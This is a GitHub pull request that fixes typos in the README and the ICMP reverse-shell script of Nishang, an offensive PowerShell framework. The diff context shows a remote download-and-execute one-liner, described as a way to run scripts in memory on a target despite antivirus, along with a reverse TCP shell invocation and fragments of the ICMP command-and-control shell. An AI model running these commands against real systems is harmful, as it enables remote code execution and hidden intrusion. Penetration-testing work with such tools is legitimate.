Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix a few typos in readme and ICMP shell #98

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Fix a few typos in readme and ICMP shell #98

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
d4df56c
Update README.md: fix typos
Karneades Apr 25, 2024
c22967a
Update Invoke-PowerShellIcmp.ps1: fix typos
Karneades Apr 25, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 2 additions & 2 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ PS C:\nishang> Get-Help Get-WLAN-Keys -Full
```

#### Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Nishang scripts are flagged by many Anti Viruses as malicious. The scripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:

Method 1. Use the in-memory dowload and execute:
Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
Expand All @@ -48,7 +48,7 @@ powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>
Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell
All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`.

Encode the scrript using Invoke-Encode from Nishang:
Encode the script using Invoke-Encode from Nishang:

```powershell
PS C:\nishang> . \nishang\Utility\Invoke-Encode
Expand Down
6 changes: 3 additions & 3 deletions Shells/Invoke-PowerShellIcmp.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ function Invoke-PowerShellIcmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.

.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
Expand All @@ -16,7 +16,7 @@ The IP address of the server/listener to connect to.
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.

.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
The size of output buffer. Default is 128.

.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
Expand Down Expand Up @@ -78,7 +78,7 @@ https://github.com/samratashok/nishang
$index = [math]::floor($sendbytes.length/$BufferSize)
$i = 0

#Fragmant larger output into smaller ones to send to the server.
#Fragment larger output into smaller ones to send to the server.
if ($sendbytes.length -gt $BufferSize)
{
while ($i -lt $index )
Expand Down